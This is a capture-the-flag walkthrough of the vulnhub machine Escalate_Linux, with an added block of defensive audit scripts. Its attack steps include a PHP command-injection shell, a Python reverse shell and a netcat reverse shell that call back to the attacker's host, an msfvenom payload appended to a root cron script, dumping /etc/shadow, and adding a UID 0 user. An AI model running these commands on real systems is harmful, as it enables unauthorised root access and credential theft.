The escalate_linux walkthrough covers the vulnhub machine a beginner ethical hacker should be working through to learn Linux privilege escalation. Escalate_Linux level 1 is a vulnhub virtual machine that offers 12 different ways to reach root access through a variety of privilege escalation techniques. It is purposefully designed to showcase different ways to escalate privileges on a Linux host. Overall it is a great exercise because of the variety and scope of the steps needed to fully exploit the machine’s security controls.
Here is an overview of what privilege escalation techniques are used in this tutorial:
- SUID/GUID Files Exploitation
- Vim/Nano Escape
- Crontab Exploitation
- Weak Passwords Cracking
- Kernel Exploits
- Adding New Users to /etc/passwd
Here’s What You Need
- Escalate_Linux Level 1 Virtual Machine from vulnhub (VirtualBox)
- Kali Linux Virtual Machine (VirtualBox)
Information Gathering – escalate_linux walkthrough
Start with an nmap scan.
Dirb
Running dirb unfortunately does not return anything useful. Visiting the endpoints it exposes on the apache server gives nothing to go on at this point.
Gobuster
Running gobuster is like pulling out the big guns. It is a recon tool written in Go, and because it is compiled it is fast. It turns out to be the trick to finding interesting endpoints on the web server, which are worth investigating.
I run the following using gobuster. Note that the -x flag tells it to also look for files with the listed extensions, php and html.
gobuster dir -w /usr/share/wordlist/seclists/Discovery/Web-Content/common.txt -u http://10.0.2.18 -x .php,.html
Web Exploitation
Following the endpoint found with gobuster, 10.0.2.18/shell.php, I find a command injection vulnerability: the shell hosted on the web server runs whatever command I pass as a parameter. So, for example, this works:
10.0.2.18/shell.php?cmd=ifconfig; ping 10.0.2.18
The reason this is possible is because of the shell.php file. The apache web server is hosting this PHP shell oneliner as shown below.
<?php system($_GET['cmd']); echo '/*pass cmd as get parameter*/' ?>
Now why is that? Think about it, netcat may not be installed purposefully on the remote machine! But maybe Python is?
http://10.0.2.18/shell.php?cmd=ifconfig;python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.17",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
And guess what? Boom! This gets a reverse shell back to my Kali machine without using meterpreter. This matters for those preparing for the OSCP exam, which heavily restricts its use.
The next step is to upgrade to a fully functional shell by using Python’s pty module to spawn a bash shell.
python -c 'import pty; pty.spawn("/bin/bash")'
One of the first objectives is to upload tools to the remote host in order to escalate privileges. The first thing I find out is that I do not have write access to the home directory of user5. I try writing to /var/tmp and it goes off without a hitch.
cd /var/tmp
wget http://10.0.2.17:8000/LinEnum.sh
chmod 777 LinEnum.sh
./LinEnum.sh >> lin-enum-output.txt
AutoRecon – escalate_linux walkthrough
AutoRecon is the premier automated scanning tool that I use often. As you use it you come to appreciate the convenience of having the artifacts for each host organized for you. Organization can become difficult and confusing as a full enumeration and exploitation goes on across multiple hosts.
The report directory contains some auto-generated files and directories that are useful for reporting:
github.com/tib3rius/AutoRecon
local.txt can be used to store the local.txt flag found on targets.
notes.txt should contain a basic template where you can write notes for each service discovered.
proof.txt can be used to store the proof.txt flag found on targets.
[*] http found on tcp/80.
[*] rpcbind found on tcp/111.
[*] netbios-ssn found on tcp/139.
[*] netbios-ssn found on tcp/445.
[*] nfs_acl found on tcp/2049.
[*] nlockmgr found on tcp/42977.
[*] mountd found on tcp/43747.
[*] mountd found on tcp/44203.
[*] mountd found on tcp/60243.
[*] netbios-ns found on udp/137.
LinEnum – escalate_linux walkthrough
To run LinEnum on the remote machine I start a Python web server with python -m SimpleHTTPServer 8000. Then using wget I grab the file and write it to the /var/tmp folder.
Kernel
Kernel information is shown here. There is most likely a kernel exploit available for this machine.
SUID
The output for SUID files is shown here. There are a few interesting items that I will definitely look into as a way to escalate privileges.
RW Permissions
The world-writable files are shown below. These are the files that any authenticated user can read and write to. I can also see that gcc, wget, and netcat are installed. These will be needed for any kernel exploits and are also useful for transferring files to the machine from Kali.
Crontab
The scheduled cron jobs are shown below. There is certainly enough information here to warrant attempting to exploit cron jobs.
NFS Enumeration – escalate_linux walkthrough
I notice there are several mountd services running and an nfs service running. Ultimately these prove to be fruitless in pursuit of a shell.
mount -t nfs 10.0.2.18:/ /mnt/el1/
mount: /mnt/el1: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.
This error is solved by installing the right helper utilities with an apt -y install nfs-common.
$ mount -t nfs 10.0.2.18:/ /mnt -o nolock
mount: /mnt: bad option; for several filesystems (e.g. nfs, cifs) you might need a /sbin/mount.<type> helper program.
$ apt-get install cifs-utils
After installing the NFS helper package on Linux I mount the remote NFS share and continue to search for an entry point. At this point the remote filesystem “/” is successfully mounted on my local /mnt directory.
# get the wrapper program
$ sudo apt-get install nfs-common
# mount the remote share
$ mount -t nfs 10.0.2.18:/ /mnt -o nolock
# confirm that the share is mounted locally on /mnt
$ df -k
Filesystem 1K-blocks Used Available Use% Mounted on
udev 1502808 0 1502808 0% /dev
tmpfs 305092 9584 295508 4% /run
/dev/sda1 79980100 32362584 43511740 43% /
tmpfs 1525452 4080 1521372 1% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 1525452 0 1525452 0% /sys/fs/cgroup
Downloads 244912536 216949828 27962708 89% /media/sf_Downloads
tmpfs 305088 16 305072 1% /run/user/130
tmpfs 305088 44 305044 1% /run/user/0
/dev/sr0 83904 83904 0 100% /media/cdrom0
10.0.2.18:/ 226639488 5988480 209068800 3% /mnt
SMB Enumeration – escalate_linux walkthrough
Enum4Linux
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
One of the best things about enum4linux is that it can enumerate the users exposed over SMB, which should be active accounts on the machine.
==============================================================
| Users on 10.0.2.18 via RID cycling (RIDS: 500-550,1000-1050) |
==============================================================
S-1-22-1-1000 Unix User\user1 (Local User)
S-1-22-1-1001 Unix User\user2 (Local User)
S-1-22-1-1002 Unix User\user3 (Local User)
S-1-22-1-1003 Unix User\user4 (Local User)
S-1-22-1-1004 Unix User\user5 (Local User)
S-1-22-1-1005 Unix User\user6 (Local User)
S-1-22-1-1006 Unix User\user7 (Local User)
S-1-22-1-1007 Unix User\user8 (Local User)
After successfully enumerating some user accounts on the machine I attempt to connect to the shares that I have just enumerated. Ultimately there is nothing to gain from this attempt, so I press forward to more enumeration.
Using smbclient I connect to some of the open shares such as ipc$ and liteshare, but these are not anything remarkable either.
smbclient \\\\10.0.2.18\\ipc$
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \>
Looking for SUID/GUID Files
The first step in Linux privilege escalation is to check for files with the SUID/GUID bit set. This means that the file or files can be run with the permissions of the file(s) owner/group. Among the results, the file script turns out to be executable by my current user.
$ find / -perm -u=s -type f 2>/dev/null
/home/user5/script
/home/user3/shell
-rwsr-xr-x 1 root root 8392 Jun 4 15:57 script
Running the file does not appear to lead to anything of consequence, so I press on and try the other interesting file, shell.
1. Abusing SUID/GUID Files
The first way to escalate privileges to root is simple. Finding this is done by looking through directories naturally for interesting files. But LinEnum has already done that and revealed all the SUID/GUID files. One of them is shell found in a user’s directory. Running it opens a bash shell running as root.
2. Exploiting Weak Passwords
With root access I now look to start cracking passwords. To do this I list the usernames with cat /etc/passwd and then list out the passwords with cat /etc/shadow. The final step is to run john on the hashes to crack them locally on my Kali machine. The resulting password to root is 12345.
3. Exploit Cronjobs
Notice that the file autoscript.sh is scheduled to run every five minutes. It is owned by root, meaning that it will run with root privileges. The file is also writable by root, which I now am. The task then is to create a command that returns a shell and append it to this file. When the file runs again in five minutes, the resulting shell will be running as root.
$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.0.2.17 LPORT=443 -f raw
$ echo 'mkfifo /tmp/znaiyl; nc 10.0.2.17 443 0</tmp/znaiyl | /bin/sh >/tmp/znaiyl 2>&1; rm /tmp/znaiyl' >> autoscript.sh
4. Exploiting the /etc/passwd File
In Linux when a new user is created an entry is made in /etc/passwd, /etc/group, and /etc/shadow. The latter contains the hashed password of the user. In order to abuse this process for escalating privileges one needs write access to /etc/passwd. After the initial escalation, whether by running shell or by cracking root’s password, this is now possible, as root has permission to edit /etc/passwd.
# generate a new password using Openssl
$ openssl passwd guru iamguru
The new user entry will be a complete string of guru:$gurupassword:0:0:/root/root:/bin/bash
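The three findings above (a root-owned setuid binary in a home directory, a root cron script that others can edit, and an extra UID 0 entry in /etc/passwd) are all things a defender can check for in seconds. The following audit helpers are an added example written for this page, not code from the walkthrough; they assume a POSIX sh with find, grep, awk, sort and tr, and the file names in the comments are constructed.

```shell
#!/bin/sh
# Added defender-side audit helpers, not part of the walkthrough. Assumes a
# POSIX sh with find, grep, awk, sort and tr; sample inputs are constructed.

# Setuid/setgid regular files under the given root that sit outside the usual
# system trees. A root-owned setuid binary in a home directory, like
# /home/user3/shell above, is exactly the kind of thing this surfaces.
audit_suid() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
        grep -Ev '^(/usr|/bin|/sbin|/lib|/lib64|/snap)(/|$)' | sort || true
}

# Accounts in a passwd-format file that have UID 0 but are not named root:
# the footprint left by appending a guru:...:0:0:... line to /etc/passwd.
audit_uid0() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "$1"
}

# Absolute paths named in a system crontab (user-field format) that resolve to
# world-writable regular files, i.e. scripts anyone can edit before root runs
# them, as with autoscript.sh above.
audit_cron() {
    grep -Ev '^[[:space:]]*(#|$)' "$1" | tr ' \t' '\n\n' | grep '^/' | sort -u |
    while IFS= read -r f; do
        if [ -f "$f" ] && [ -n "$(find "$f" -maxdepth 0 -perm -0002 2>/dev/null)" ]; then
            echo "$f"
        fi
    done
}

# On a live host, run as root and review each list:
#   audit_suid / ; audit_uid0 /etc/passwd ; audit_cron /etc/crontab
```

Each function prints only the offending entries, so an empty result means that particular check is clean.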
5. Escaping vim Editor for Priv Esc
The output from LinEnum during initial enumeration reveals that user8 can run vi with root privileges. This is a perfect setup for escaping vim in order to escalate privileges.
To escape from within vim and escalate privileges, run sudo vi and from there run :!sh to open a root shell.
6. Exploiting PATH Variables
Another way to abuse the SUID files in this directory is to abuse script. Since initial enumeration reveals that the file runs with root privileges a new file with the same name can lead to a root shell.
# could do this but
echo 'cat /etc/shadow' >> script
chmod 777 script
./script
The above works, but rather than overwriting files, the following is the non-destructive method to use instead. The commands shown below list the contents of /etc/shadow. From there the root password can be cracked and I can switch to root.
echo 'cat /etc/shadow' >> ls
chmod 777 ls
export PATH=/var/tmp:$PATH
cd /home/user5
./script